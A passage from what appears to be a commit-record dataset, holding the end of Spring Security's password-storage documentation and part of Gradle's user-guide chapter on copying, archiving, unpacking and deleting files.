password on your system.\nThe current implementation of the `Argon2PasswordEncoder` requires BouncyCastle.\n\n.Argon2PasswordEncoder\n====\n.Java\n[source,java,role=\"primary\"]\n----\n\/\/ Create an encoder with all the defaults\nArgon2PasswordEncoder encoder = new Argon2PasswordEncoder();\nString result = encoder.encode(\"myPassword\");\nassertTrue(encoder.matches(\"myPassword\", result));\n----\n\n.Kotlin\n[source,kotlin,role=\"secondary\"]\n----\n\/\/ Create an encoder with all the defaults\nval encoder = Argon2PasswordEncoder()\nval result: String = encoder.encode(\"myPassword\")\nassertTrue(encoder.matches(\"myPassword\", result))\n----\n====\n\n[[authentication-password-storage-pbkdf2]]\n== Pbkdf2PasswordEncoder\n\nThe `Pbkdf2PasswordEncoder` implementation uses the https:\/\/en.wikipedia.org\/wiki\/PBKDF2[PBKDF2] algorithm to hash the passwords.\nIn order to defeat password cracking PBKDF2 is a deliberately slow algorithm.\nLike other adaptive one-way functions, it should be tuned to take about 1 second to verify a password on your system.\nThis algorithm is a good choice when FIPS certification is required.\n\n.Pbkdf2PasswordEncoder\n====\n.Java\n[source,java,role=\"primary\"]\n----\n\/\/ Create an encoder with all the defaults\nPbkdf2PasswordEncoder encoder = new Pbkdf2PasswordEncoder();\nString result = encoder.encode(\"myPassword\");\nassertTrue(encoder.matches(\"myPassword\", result));\n----\n\n.Kotlin\n[source,kotlin,role=\"secondary\"]\n----\n\/\/ Create an encoder with all the defaults\nval encoder = Pbkdf2PasswordEncoder()\nval result: String = encoder.encode(\"myPassword\")\nassertTrue(encoder.matches(\"myPassword\", result))\n----\n====\n\n[[authentication-password-storage-scrypt]]\n== SCryptPasswordEncoder\n\nThe `SCryptPasswordEncoder` implementation uses https:\/\/en.wikipedia.org\/wiki\/Scrypt[scrypt] algorithm to hash the passwords.\nIn order to defeat password cracking on custom hardware scrypt is a deliberately slow algorithm that requires large amounts of memory.\nLike other adaptive one-way functions, it should be tuned to take about 1 second to verify a password on your 
system.\n\n.SCryptPasswordEncoder\n====\n.Java\n[source,java,role=\"primary\"]\n----\n\/\/ Create an encoder with all the defaults\nSCryptPasswordEncoder encoder = new SCryptPasswordEncoder();\nString result = encoder.encode(\"myPassword\");\nassertTrue(encoder.matches(\"myPassword\", result));\n----\n\n.Kotlin\n[source,kotlin,role=\"secondary\"]\n----\n\/\/ Create an encoder with all the defaults\nval encoder = SCryptPasswordEncoder()\nval result: String = encoder.encode(\"myPassword\")\nassertTrue(encoder.matches(\"myPassword\", result))\n----\n====\n\n[[authentication-password-storage-other]]\n== Other PasswordEncoders\n\nThere are a significant number of other `PasswordEncoder` implementations that exist entirely for backward compatibility.\nThey are all deprecated to indicate that they are no longer considered secure.\nHowever, there are no plans to remove them since it is difficult to migrate existing legacy systems.\n\n[[authentication-password-storage-configuration]]\n== Password Storage Configuration\n\nSpring Security uses <<authentication-password-storage-dpe>> by default.\nHowever, this can be customized by exposing a `PasswordEncoder` as a Spring bean.\n\n\nIf you are migrating from Spring Security 4.2.x you can revert to the previous behavior by exposing a `NoOpPasswordEncoder` bean.\n\n[WARNING]\n====\nReverting to `NoOpPasswordEncoder` is not considered to be secure.\nYou should instead migrate to using `DelegatingPasswordEncoder` to support secure password encoding.\n====\n\n.NoOpPasswordEncoder\n====\n.Java\n[source,java,role=\"primary\"]\n----\n@Bean\npublic static NoOpPasswordEncoder passwordEncoder() {\n return NoOpPasswordEncoder.getInstance();\n}\n----\n\n.XML\n[source,xml,role=\"secondary\"]\n----\n<b:bean id=\"passwordEncoder\"\n class=\"org.springframework.security.crypto.password.NoOpPasswordEncoder\" factory-method=\"getInstance\"\/>\n----\n\n.Kotlin\n[source,kotlin,role=\"secondary\"]\n----\n@Bean\nfun passwordEncoder(): PasswordEncoder {\n return NoOpPasswordEncoder.getInstance();\n}\n----\n====\n\n[NOTE]\n====\nXML Configuration requires the `NoOpPasswordEncoder` bean name to be `passwordEncoder`.\n====\n\n[[authentication-change-password-configuration]]\n== Change Password Configuration\n\nMost applications that allow a user to specify a password also require a feature for updating that password.\n\nhttps:\/\/w3c.github.io\/webappsec-change-password-url\/[A Well-Know URL for Changing Passwords] indicates a mechanism by which password managers can discover the password update endpoint for a given application.\n\nYou can configure Spring Security to provide this discovery endpoint.\nFor example, if the change password endpoint in your application is `\/change-password`, then you can configure Spring Security like so:\n\n.Default Change Password Endpoint\n====\n.Java\n[source,java,role=\"primary\"]\n----\nhttp\n .passwordManagement(Customizer.withDefaults())\n----\n\n.XML\n[source,xml,role=\"secondary\"]\n----\n<sec:password-management\/>\n----\n\n.Kotlin\n[source,kotlin,role=\"secondary\"]\n----\nhttp {\n passwordManagement { }\n}\n----\n====\n\nThen, when a password manager navigates to `\/.well-known\/change-password` then Spring Security will redirect your endpoint, `\/change-password`.\n\nOr, if your endpoint is something other than `\/change-password`, you can also specify that like so:\n\n.Change Password Endpoint\n====\n.Java\n[source,java,role=\"primary\"]\n----\nhttp\n .passwordManagement((management) -> management\n 
.changePasswordPage(\"\/update-password\")\n )\n----\n\n.XML\n[source,xml,role=\"secondary\"]\n----\n<sec:password-management change-password-page=\"\/update-password\"\/>\n----\n\n.Kotlin\n[source,kotlin,role=\"secondary\"]\n----\nhttp {\n passwordManagement {\n changePasswordPage = \"\/update-password\"\n }\n}\n----\n====\n\nWith the above configuration, when a password manager navigates to `\/.well-known\/change-password`, then Spring Security will redirect to `\/update-password`.\n","returncode":0,"stderr":"","license":"apache-2.0","lang":"AsciiDoc"} {"commit":"dbd99c0bd84d4d98f046d0157a63665412f113db","subject":"Improve documentation for installing executables with Copy","message":"Improve documentation for installing executables with Copy\n\nCo-authored-by: L\u00f3r\u00e1nt Pint\u00e9r <af37ce1066612ac119d4d429b57f5a7aabf0bdac@gradle.com>","repos":"blindpirate\/gradle,gradle\/gradle,gradle\/gradle,blindpirate\/gradle,blindpirate\/gradle,blindpirate\/gradle,blindpirate\/gradle,blindpirate\/gradle,gradle\/gradle,blindpirate\/gradle,blindpirate\/gradle,gradle\/gradle,gradle\/gradle,gradle\/gradle,gradle\/gradle,blindpirate\/gradle,blindpirate\/gradle,gradle\/gradle,gradle\/gradle,gradle\/gradle","old_file":"subprojects\/docs\/src\/docs\/userguide\/authoring-builds\/working_with_files.adoc","new_file":"subprojects\/docs\/src\/docs\/userguide\/authoring-builds\/working_with_files.adoc","new_contents":"\/\/ Copyright 2017 the original author or authors.\n\/\/\n\/\/ Licensed under the Apache License, Version 2.0 (the \"License\");\n\/\/ you may not use this file except in compliance with the License.\n\/\/ You may obtain a copy of the License at\n\/\/\n\/\/ http:\/\/www.apache.org\/licenses\/LICENSE-2.0\n\/\/\n\/\/ Unless required by applicable law or agreed to in writing, software\n\/\/ distributed under the License is distributed on an \"AS IS\" BASIS,\n\/\/ WITHOUT WARRANTIES OR CONDITIONS OF ANY KIND, either express or implied.\n\/\/ See the License for the specific language governing permissions and\n\/\/ limitations under the License.\n\n[[working_with_files]]\n= Working With Files\n\nAlmost every Gradle build interacts with files in some way: think source files, file dependencies, reports and so on. That's why Gradle comes with a comprehensive API that makes it simple to perform the file operations you need.\n\nThe API has two parts to it:\n\n * Specifying which files and directories to process\n * Specifying what to do with them\n\nThe <<#sec:locating_files,File paths in depth>> section covers the first of these in detail, while subsequent sections, like <<#sec:copying_files,File copying in depth>>, cover the second. To begin with, we'll show you examples of the most common scenarios that users encounter.\n\n[[sec:copying_single_file_example]]\n== Copying a single file\n\nYou copy a file by creating an instance of Gradle's builtin link:{groovyDslPath}\/org.gradle.api.tasks.Copy.html[Copy] task and configuring it with the location of the file and where you want to put it. 
This example mimics copying a generated report into a directory that will be packed into an archive, such as a ZIP or TAR:\n\n.How to copy a single file\n====\ninclude::sample[dir=\"snippets\/files\/copy\/groovy\",files=\"build.gradle[tags=copy-single-file-example]\"]\ninclude::sample[dir=\"snippets\/files\/copy\/kotlin\",files=\"build.gradle.kts[tags=copy-single-file-example]\"]\n====\n\nThe link:{groovyDslPath}\/org.gradle.api.Project.html#org.gradle.api.Project:file(java.lang.Object)[Project.file(java.lang.Object)] method is used to create a file or directory path relative to the current project and is a common way to make build scripts work regardless of the project path. The file and directory paths are then used to specify what file to copy using link:{groovyDslPath}\/org.gradle.api.tasks.Copy.html#org.gradle.api.tasks.Copy:from(java.lang.Object++[]++)[Copy.from(java.lang.Object...)] and which directory to copy it to using link:{groovyDslPath}\/org.gradle.api.tasks.Copy.html#org.gradle.api.tasks.Copy:into(java.lang.Object)[Copy.into(java.lang.Object)].\n\nYou can even use the path directly without the `file()` method, as explained early in the section <<#sec:copying_files,File copying in depth>>:\n\n.Using implicit string paths\n====\ninclude::sample[dir=\"snippets\/files\/copy\/groovy\",files=\"build.gradle[tags=copy-single-file-example-without-file-method]\"]\ninclude::sample[dir=\"snippets\/files\/copy\/kotlin\",files=\"build.gradle.kts[tags=copy-single-file-example-without-file-method]\"]\n====\n\nAlthough hard-coded paths make for simple examples, they also make the build brittle. It's better to use a reliable, single source of truth, such as a task or shared project property. In the following modified example, we use a report task defined elsewhere that has the report's location stored in its `outputFile` property:\n\n.Prefer task\/project properties over hard-coded paths\n====\ninclude::sample[dir=\"snippets\/files\/copy\/groovy\",files=\"build.gradle[tags=copy-single-file-example-with-task-properties]\"]\ninclude::sample[dir=\"snippets\/files\/copy\/kotlin\",files=\"build.gradle.kts[tags=copy-single-file-example-with-task-properties]\"]\n====\n\nWe have also assumed that the reports will be archived by `archiveReportsTask`, which provides us with the directory that will be archived and hence where we want to put the copies of the reports.\n\n[[sec:copying_multiple_files_example]]\n== Copying multiple files\n\nYou can extend the previous examples to multiple files very easily by providing multiple arguments to `from()`:\n\n.Using multiple arguments with from()\n====\ninclude::sample[dir=\"snippets\/files\/copy\/groovy\",files=\"build.gradle[tags=copy-multiple-files-example]\"]\ninclude::sample[dir=\"snippets\/files\/copy\/kotlin\",files=\"build.gradle.kts[tags=copy-multiple-files-example]\"]\n====\n\nTwo files are now copied into the archive directory. You can also use multiple `from()` statements to do the same thing, as shown in the first example of the section <<#sec:copying_files, File copying in depth>>.\n\nNow consider another example: what if you want to copy all the PDFs in a directory without having to specify each one? To do this, attach inclusion and\/or exclusion patterns to the copy specification. 
Here we use a string pattern to include PDFs only:\n\n.Using a flat filter\n====\ninclude::sample[dir=\"snippets\/files\/copy\/groovy\",files=\"build.gradle[tags=copy-multiple-files-with-flat-filter-example]\"]\ninclude::sample[dir=\"snippets\/files\/copy\/kotlin\",files=\"build.gradle.kts[tags=copy-multiple-files-with-flat-filter-example]\"]\n====\n\nOne thing to note, as demonstrated in the following diagram, is that only the PDFs that reside directly in the `reports` directory are copied:\n\n.The effect of a flat filter on copying\nimage::copy-with-flat-filter-example.png[]\n\nYou can include files in subdirectories by using an Ant-style glob pattern (`\\**\/*`), as done in this updated example:\n\n.Using a deep filter\n====\ninclude::sample[dir=\"snippets\/files\/copy\/groovy\",files=\"build.gradle[tags=copy-multiple-files-with-deep-filter-example]\"]\ninclude::sample[dir=\"snippets\/files\/copy\/kotlin\",files=\"build.gradle.kts[tags=copy-multiple-files-with-deep-filter-example]\"]\n====\n\nThis task has the following effect:\n\n.The effect of a deep filter on copying\nimage::copy-with-deep-filter-example.png[]\n\nOne thing to bear in mind is that a deep filter like this has the side effect of copying the directory structure below `reports` as well as the files. If you just want to copy the files without the directory structure, you need to use an explicit `fileTree(_dir_) { _includes_ }.files` expression. We talk more about the difference between file trees and file collections in the <<#sec:file_trees,File trees>> section.\n\nThis is just one of the variations in behavior you're likely to come across when dealing with file operations in Gradle builds. Fortunately, Gradle provides elegant solutions to almost all those use cases. Read the _in-depth_ sections later in the chapter for more detail on how the file operations work in Gradle and what options you have for configuring them.\n\n[[sec:copying_directories_example]]\n== Copying directory hierarchies\n\nYou may have a need to copy not just files, but the directory structure they reside in as well. This is the default behavior when you specify a directory as the `from()` argument, as demonstrated by the following example that copies everything in the `reports` directory, including all its subdirectories, to the destination:\n\n.Copying an entire directory\n====\ninclude::sample[dir=\"snippets\/files\/copy\/groovy\",files=\"build.gradle[tags=copy-directory-example]\"]\ninclude::sample[dir=\"snippets\/files\/copy\/kotlin\",files=\"build.gradle.kts[tags=copy-directory-example]\"]\n====\n\nThe key aspect that users struggle with is controlling how much of the directory structure goes to the destination. In the above example, do you get a `toArchive\/reports` directory or does everything in `reports` go straight into `toArchive`? The answer is the latter. If a directory is part of the `from()` path, then it _won't_ appear in the destination.\n\nSo how do you ensure that `reports` itself is copied across, but not any other directory in `$buildDir`? The answer is to add it as an include pattern:\n\n.Copying an entire directory, including itself\n====\ninclude::sample[dir=\"snippets\/files\/copy\/groovy\",files=\"build.gradle[tags=copy-directory-including-itself-example]\"]\ninclude::sample[dir=\"snippets\/files\/copy\/kotlin\",files=\"build.gradle.kts[tags=copy-directory-including-itself-example]\"]\n====\n\nYou'll get the same behavior as before except with one extra level of directory in the destination, i.e. 
`toArchive\/reports`.\n\nOne thing to note is how the `include()` directive applies only to the `from()`, whereas the directive in the previous section applied to the whole task.\nThese different levels of granularity in the copy specification allow you to easily handle most requirements that you will come across.\nYou can learn more about this in the section on <<sub:using_child_copy_specifications,child specifications>>.\n\n[[sec:creating_archives_example]]\n== Creating archives (zip, tar, etc.)\n\nFrom the perspective of Gradle, packing files into an archive is effectively a copy in which the destination is the archive file rather than a directory on the file system. This means that creating archives looks a lot like copying, with all of the same features!\n\nThe simplest case involves archiving the entire contents of a directory, which this example demonstrates by creating a ZIP of the `toArchive` directory:\n\n.Archiving a directory as a ZIP\n====\ninclude::sample[dir=\"snippets\/files\/copy\/groovy\",files=\"build.gradle[tags=create-archive-example]\"]\ninclude::sample[dir=\"snippets\/files\/copy\/kotlin\",files=\"build.gradle.kts[tags=create-archive-example]\"]\n====\n\nNotice how we specify the destination and name of the archive instead of an `into()`: both are required. You often won't see them explicitly set, because most projects apply the <<base_plugin.adoc#base_plugin,Base Plugin>>. It provides some conventional values for those properties. The next example demonstrates this and you can learn more about the conventions in the <<#sec:archive_naming,archive naming>> section.\n\nEach type of archive has its own task type, the most common ones being link:{groovyDslPath}\/org.gradle.api.tasks.bundling.Zip.html[Zip], link:{groovyDslPath}\/org.gradle.api.tasks.bundling.Tar.html[Tar] and link:{groovyDslPath}\/org.gradle.api.tasks.bundling.Jar.html[Jar]. They all share most of the configuration options of `Copy`, including filtering and renaming.\n\nOne of the most common scenarios involves copying files into specified subdirectories of the archive. For example, let's say you want to package all PDFs into a `docs` directory in the root of the archive. This `docs` directory doesn't exist in the source location, so you have to create it as part of the archive. You do this by adding an `into()` declaration for just the PDFs:\n\n.Using the Base Plugin for its archive name convention\n====\ninclude::sample[dir=\"snippets\/files\/archivesWithBasePlugin\/groovy\",files=\"build.gradle[tags=create-archive-with-base-plugin-example]\"]\ninclude::sample[dir=\"snippets\/files\/archivesWithBasePlugin\/kotlin\",files=\"build.gradle.kts[tags=create-archive-with-base-plugin-example]\"]\n====\n\nAs you can see, you can have multiple `from()` declarations in a copy specification, each with its own configuration. 
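\n\nA rough Kotlin DSL sketch of that idea might look like the following (the task name and directory layout are invented for illustration; the Base Plugin supplies the archive name and destination conventions):\n\n[source,kotlin]\n----\nplugins {\n    base \/\/ conventions for archive names and destination directory\n}\n\nversion = \"1.0.0\"\n\ntasks.register<Zip>(\"packageDistribution\") {\n    from(\"$buildDir\/toArchive\") {\n        exclude(\"**\/*.pdf\") \/\/ everything except PDFs goes to the archive root\n    }\n    from(\"$buildDir\/toArchive\") {\n        include(\"**\/*.pdf\")\n        into(\"docs\") \/\/ PDFs land in a docs\/ directory inside the archive\n    }\n}\n----\n\n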
See <<#sub:using_child_copy_specifications,Using child copy specifications>> for more information on this feature.\n\n[[sec:unpacking_archives_example]]\n== Unpacking archives\n\nArchives are effectively self-contained file systems, so unpacking them is a case of copying the files from that file system onto the local file system \u2014\u00a0or even into another archive.\nGradle enables this by providing some wrapper functions that make archives available as hierarchical collections of files (<<sec:file_trees,file trees>>).\n\nThe two functions of interest are link:{groovyDslPath}\/org.gradle.api.Project.html#org.gradle.api.Project:zipTree(java.lang.Object)[Project.zipTree(java.lang.Object)] and link:{groovyDslPath}\/org.gradle.api.Project.html#org.gradle.api.Project:tarTree(java.lang.Object)[Project.tarTree(java.lang.Object)], which produce a link:{javadocPath}\/org\/gradle\/api\/file\/FileTree.html[FileTree] from a corresponding archive file. That file tree can then be used in a `from()` specification, like so:\n\n.Unpacking a ZIP file\n====\ninclude::sample[dir=\"snippets\/files\/archives\/groovy\",files=\"build.gradle[tags=unpack-archive-example]\"]\ninclude::sample[dir=\"snippets\/files\/archives\/kotlin\",files=\"build.gradle.kts[tags=unpack-archive-example]\"]\n====\n\nAs with a normal copy, you can control which files are unpacked via <<#sec:filtering_files,filters>> and even <<#sec:renaming_files,rename files>> as they are unpacked.\n\nMore advanced processing can be handled by the link:{groovyDslPath}\/org.gradle.api.tasks.AbstractCopyTask.html#eachFile(org.gradle.api.Action)[eachFile()] method. For example, you might need to extract different subtrees of the archive into different paths within the destination directory. The following sample uses the method to extract the files within the archive's `libs` directory into the root destination directory, rather than into a `libs` subdirectory:\n\n.Unpacking a subset of a ZIP file\n====\ninclude::sample[dir=\"snippets\/files\/archives\/groovy\",files=\"build.gradle[tags=unpack-archive-subset-example]\"]\ninclude::sample[dir=\"snippets\/files\/archives\/kotlin\",files=\"build.gradle.kts[tags=unpack-archive-subset-example]\"]\n====\n<1> Extracts only the subset of files that reside in the `libs` directory\n<2> Remaps the path of the extracted files into the destination directory by dropping the `libs` segment from the file path\n<3> Ignores the empty directories resulting from the remapping; see the Caution note below\n\n[CAUTION]\n====\nYou cannot change the destination path of empty directories with this technique.\nYou can learn more in https:\/\/github.com\/gradle\/gradle\/issues\/2940[this issue].\n====\n\nIf you're a Java developer and are wondering why there is no `jarTree()` method, that's because `zipTree()` works perfectly well for JARs, WARs and EARs.\n\n[[sec:creating_uber_jar_example]]\n== Creating \"uber\" or \"fat\" JARs\n\nIn the Java space, applications and their dependencies typically used to be packaged as separate JARs within a single distribution archive. That still happens, but there is another approach that is now common: placing the classes and resources of the dependencies directly into the application JAR, creating what is known as an uber or fat JAR.\n\nGradle makes this approach easy to accomplish. Consider the aim: to copy the contents of other JAR files into the application JAR. 
All you need for this is the link:{groovyDslPath}\/org.gradle.api.Project.html#org.gradle.api.Project:zipTree(java.lang.Object)[Project.zipTree(java.lang.Object)] method and the link:{groovyDslPath}\/org.gradle.api.tasks.bundling.Jar.html[Jar] task, as demonstrated by the `uberJar` task in the following example:\n\n.Creating a Java uber or fat JAR\n====\ninclude::sample[dir=\"snippets\/files\/archivesWithJavaPlugin\/groovy\",files=\"build.gradle[tags=create-uber-jar-example]\"]\ninclude::sample[dir=\"snippets\/files\/archivesWithJavaPlugin\/kotlin\",files=\"build.gradle.kts[tags=create-uber-jar-example]\"]\n====\n\nIn this case, we're taking the runtime dependencies of the project \u2014 `configurations.runtimeClasspath.files` \u2014 and wrapping each of the JAR files with the `zipTree()` method. The result is a collection of ZIP file trees, the contents of which are copied into the uber JAR alongside the application classes.\n\n[[sec:creating_directories_example]]\n== Creating directories\n\nMany tasks need to create directories to store the files they generate, which is why Gradle automatically manages this aspect of tasks when they explicitly define file and directory outputs. You can learn about this feature in the <<more_about_tasks.adoc#sec:up_to_date_checks,incremental build>> section of the user manual. All core Gradle tasks ensure that any output directories they need are created if necessary using this mechanism.\n\nIn cases where you need to create a directory manually, you can use the link:{groovyDslPath}\/org.gradle.api.Project.html#org.gradle.api.Project:mkdir(java.lang.Object)[Project.mkdir(java.lang.Object)] method from within your build scripts or custom task implementations. Here's a simple example that creates a single `images` directory in the project folder:\n\n.Manually creating a directory\n====\ninclude::sample[dir=\"snippets\/files\/misc\/groovy\",files=\"build.gradle[tags=mkdir-example]\"]\ninclude::sample[dir=\"snippets\/files\/misc\/kotlin\",files=\"build.gradle.kts[tags=mkdir-example]\"]\n====\n\nAs described in the {antManual}\/Tasks\/mkdir.html[Apache Ant manual], the `mkdir` task will automatically create all necessary directories in the given path and will do nothing if the directory already exists.\n\n[[sec:moving_files_example]]\n== Moving files and directories\n\nGradle has no API for moving files and directories around, but you can use the <<ant.adoc#ant,Apache Ant integration>> to easily do that, as shown in this example:\n\n.Moving a directory using the Ant task\n====\ninclude::sample[dir=\"snippets\/files\/misc\/groovy\",files=\"build.gradle[tags=move-example]\"]\ninclude::sample[dir=\"snippets\/files\/misc\/kotlin\",files=\"build.gradle.kts[tags=move-example]\"]\n====\n\nThis is not a common requirement and should be used sparingly as you lose information and can easily break a build. It's generally preferable to copy directories and files instead.\n\n[[sec:renaming_files_example]]\n== Renaming files on copy\n\nThe files used and generated by your builds sometimes don't have names that suit, in which case you want to rename those files as you copy them. 
Gradle allows you to do this as part of a copy specification using the `rename()` configuration.\n\nThe following example removes the \"-staging-\" marker from the names of any files that have it:\n\n.Renaming files as they are copied\n====\ninclude::sample[dir=\"snippets\/files\/copy\/groovy\",files=\"build.gradle[tags=rename-on-copy-example]\"]\ninclude::sample[dir=\"snippets\/files\/copy\/kotlin\",files=\"build.gradle.kts[tags=rename-on-copy-example]\"]\n====\n\nYou can use regular expressions for this, as in the above example, or closures that use more complex logic to determine the target filename. For example, the following task truncates filenames:\n\n.Truncating filenames as they are copied\n====\ninclude::sample[dir=\"snippets\/files\/copy\/groovy\",files=\"build.gradle[tags=truncate-names-example]\"]\ninclude::sample[dir=\"snippets\/files\/copy\/kotlin\",files=\"build.gradle.kts[tags=truncate-names-example]\"]\n====\n\nAs with filtering, you can also apply renaming to a subset of files by configuring it as part of a child specification on a `from()`.\n\n[[sec:deleting_files_example]]\n== Deleting files and directories\n\nYou can easily delete files and directories using either the link:{groovyDslPath}\/org.gradle.api.tasks.Delete.html[Delete] task or the link:{groovyDslPath}\/org.gradle.api.Project.html#org.gradle.api.Project:delete(org.gradle.api.Action)[Project.delete(org.gradle.api.Action)] method.\nIn both cases, you specify which files and directories to delete in a way supported by the link:{groovyDslPath}\/org.gradle.api.Project.html#org.gradle.api.Project:files(java.lang.Object++[]++)[Project.files(java.lang.Object...)] method.\n\nFor example, the following task deletes the entire contents of a build's output directory:\n\n.Deleting a directory\n====\ninclude::sample[dir=\"snippets\/files\/misc\/groovy\",files=\"build.gradle[tags=delete-example]\"]\ninclude::sample[dir=\"snippets\/files\/misc\/kotlin\",files=\"build.gradle.kts[tags=delete-example]\"]\n====\n\nIf you want more control over which files are deleted, you can't use inclusions and exclusions in the same way as for copying files.\nInstead, you have to use the builtin filtering mechanisms of `FileCollection` and `FileTree`.\nThe following example does just that to clear out temporary files from a source directory:\n\n.Deleting files matching a specific pattern\n====\ninclude::sample[dir=\"snippets\/files\/misc\/groovy\",files=\"build.gradle[tags=delete-with-filter-example]\"]\ninclude::sample[dir=\"snippets\/files\/misc\/kotlin\",files=\"build.gradle.kts[tags=delete-with-filter-example]\"]\n====\n\nYou'll learn more about file collections and file trees in the next section.\n\n[[sec:locating_files]]\n== File paths in depth\n\nIn order to perform some action on a file, you need to know where it is, and that's the information provided by file paths. Gradle builds on the standard Java `{javaApi}\/java\/io\/File.html[File]` class, which represents the location of a single file, and provides new APIs for dealing with collections of paths. This section shows you how to use the Gradle APIs to specify file paths for use in tasks and file operations.\n\nBut first, an important note on using hard-coded file paths in your builds.\n\n\n[[sec:hard_coded_file_paths]]\n=== On hard-coded file paths\n\nMany examples in this chapter use hard-coded paths as string literals. This makes them easy to understand, but it's not good practice for real builds. 
The problem is that paths often change and the more places you need to change them, the more likely you are to miss one and break the build.\n\nWhere possible, you should use tasks, task properties, and <<writing_build_scripts.adoc#sec:extra_properties,project properties>> \u2014 in that order of preference \u2014 to configure file paths. For example, if you were to create a task that packages the compiled classes of a Java application, you should aim for something like this:\n\n.How to minimize the number of hard-coded paths in your build\n====\ninclude::sample[dir=\"snippets\/files\/sampleJavaProject\/groovy\",files=\"build.gradle[tags=link-task-properties]\"]\ninclude::sample[dir=\"snippets\/files\/sampleJavaProject\/kotlin\",files=\"build.gradle.kts[tags=link-task-properties]\"]\n====\n\nSee how we're using the `compileJava` task as the source of the files to package and we've created a project property `archivesDirPath` to store the location where we put archives, on the basis we're likely to use it elsewhere in the build.\n\nUsing a task directly as an argument like this relies on it having <<more_about_tasks.adoc#sec:task_inputs_outputs,defined outputs>>, so it won't always be possible.\nIn addition, this example could be improved further by relying on the Java plugin's convention for `destinationDirectory` rather than overriding it, but it does demonstrate the use of project properties.\n\n[[sec:single_file_paths]]\n=== Single files and directories\n\nGradle provides the link:{groovyDslPath}\/org.gradle.api.Project.html#org.gradle.api.Project:file(java.lang.Object)[Project.file(java.lang.Object)] method for specifying the location of a single file or directory.\nRelative paths are resolved relative to the project directory, while absolute paths remain unchanged.\n\n[CAUTION]\n====\nNever use `new File(relative path)` because this creates a path relative to the current working directory (CWD). Gradle can make no guarantees about the location of the CWD, which means builds that rely on it may break at any time.\n====\n\nHere are some examples of using the `file()` method with different types of argument:\n\n.Locating files\n====\ninclude::sample[dir=\"snippets\/files\/file\/groovy\",files=\"build.gradle[tags=simple-params]\"]\ninclude::sample[dir=\"snippets\/files\/file\/kotlin\",files=\"build.gradle.kts[tags=simple-params]\"]\n====\n\nAs you can see, you can pass strings, `File` instances and `{javaApi}\/java\/nio\/file\/Path.html[Path]` instances to the `file()` method, all of which result in an absolute `File` object. You can find other options for argument types in the reference guide, linked in the previous paragraph.\n\nWhat happens in the case of multi-project builds? The `file()` method will always turn relative paths into paths that are relative to the current project directory, which may be a child project. If you want to use a path that's relative to the _root project_ directory, then you need to use the special link:{groovyDslPath}\/org.gradle.api.Project.html#org.gradle.api.Project:rootDir[Project.getRootDir()] property to construct an absolute path, like so:\n\n.Creating a path relative to a parent project\n====\ninclude::sample[dir=\"snippets\/files\/misc\/groovy\/project2\",files=\"build.gradle[tags=using-root-dir-property]\"]\ninclude::sample[dir=\"snippets\/files\/misc\/kotlin\/project2\",files=\"build.gradle.kts[tags=using-root-dir-property]\"]\n====\n\nLet's say you're working on a multi-project build in a `dev\/projects\/AcmeHealth` directory. 
You use the above example in the build of the library you're fixing \u2014 at `AcmeHealth\/subprojects\/AcmePatientRecordLib\/build.gradle`. The file path will resolve to the absolute version of `dev\/projects\/AcmeHealth\/shared\/config.xml`.\n\nThe `file()` method can be used to configure any task that has a property of type `File`. Many tasks, though, work on multiple files, so we look at how to specify sets of files next.\n\n[[sec:file_collections]]\n=== File collections\n\nA _file collection_ is simply a set of file paths that's represented by the link:{javadocPath}\/org\/gradle\/api\/file\/FileCollection.html[FileCollection] interface. _Any_ file paths.\nIt's important to understand that the file paths don't have to be related in any way, so they don't have to be in the same directory or even have a shared parent directory.\nYou will also find that many parts of the Gradle API use `FileCollection`, such as the copying API discussed later in this chapter and <<declaring_dependencies.adoc#sec:what-are-dependency-configurations,dependency configurations>>.\n\nThe recommended way to specify a collection of files is to use the link:{javadocPath}\/org\/gradle\/api\/file\/ProjectLayout.html#files-java.lang.Object++...++-[ProjectLayout.files(java.lang.Object++...++)] method, which returns a `FileCollection` instance.\nThis method is very flexible and allows you to pass multiple strings, `File` instances, collections of strings, collections of ``File``s, and more.\nYou can even pass in tasks as arguments if they have <<more_about_tasks.adoc#sec:task_inputs_outputs,defined outputs>>.\nLearn about all the supported argument types in the reference guide.\n\n[CAUTION]\n====\nAlthough the `files()` method accepts `File` instances, never use `new File(relative path)` with it because this creates a path relative to the current working directory (CWD). Gradle can make no guarantees about the location of the CWD, which means builds that rely on it may break at any time.\n====\n\nAs with the link:{groovyDslPath}\/org.gradle.api.Project.html#org.gradle.api.Project:file(java.lang.Object)[Project.file(java.lang.Object)] method covered in the <<#sec:single_file_paths,previous section>>, all relative paths are evaluated relative to the current project directory. The following example demonstrates some of the variety of argument types you can use \u2014 strings, `File` instances, a list and a `{javaApi}\/java\/nio\/file\/Path.html[Path]`:\n\n.Creating a file collection\n====\ninclude::sample[dir=\"snippets\/files\/fileCollections\/groovy\",files=\"build.gradle[tags=simple-params]\"]\ninclude::sample[dir=\"snippets\/files\/fileCollections\/kotlin\",files=\"build.gradle.kts[tags=simple-params]\"]\n====\n\nFile collections have some important attributes in Gradle. They can be:\n\n * created lazily\n * iterated over\n * filtered\n * combined\n\n_Lazy creation_ of a file collection is useful when you need to evaluate the files that make up a collection at the time a build runs. 
In the following example, we query the file system to find out what files exist in a particular directory and then make those into a file collection:\n\n.Implementing a file collection\n====\ninclude::sample[dir=\"snippets\/files\/fileCollections\/groovy\",files=\"build.gradle[tags=closure]\"]\ninclude::sample[dir=\"snippets\/files\/fileCollections\/kotlin\",files=\"build.gradle.kts[tags=closure]\"]\n====\n\n.Output of **`gradle -q list`**\n----\n> gradle -q list\ninclude::{snippetsPath}\/files\/fileCollections\/tests\/fileCollectionsWithClosure.out[]\n----\n\nThe key to lazy creation is passing a closure (in Groovy) or a `Provider` (in Kotlin) to the `files()` method. Your closure\/provider simply needs to return a value of a type accepted by `files()`, such as `List<File>`, `String`, `FileCollection`, etc.\n\n_Iterating over a file collection_ can be done through the `each()` method (in Groovy) or `forEach` method (in Kotlin) on the collection, or by using the collection in a `for` loop. In both approaches, the file collection is treated as a set of `File` instances, i.e. your iteration variable will be of type `File`.\n\nThe following example demonstrates such iteration as well as how you can convert file collections to other types using the `as` operator or supported properties:\n\n.Using a file collection\n====\ninclude::sample[dir=\"snippets\/files\/fileCollections\/groovy\",files=\"build.gradle[tags=usage]\"]\ninclude::sample[dir=\"snippets\/files\/fileCollections\/kotlin\",files=\"build.gradle.kts[tags=usage]\"]\n====\n\nYou can also see at the end of the example _how to combine file collections_ using the `+` and `-` operators to merge and subtract them. An important feature of the resulting file collections is that they are _live_. In other words, when you combine file collections in this way, the result always reflects what's currently in the source file collections, even if they change during the build.\n\nFor example, imagine `collection` in the above example gains an extra file or two after `union` is 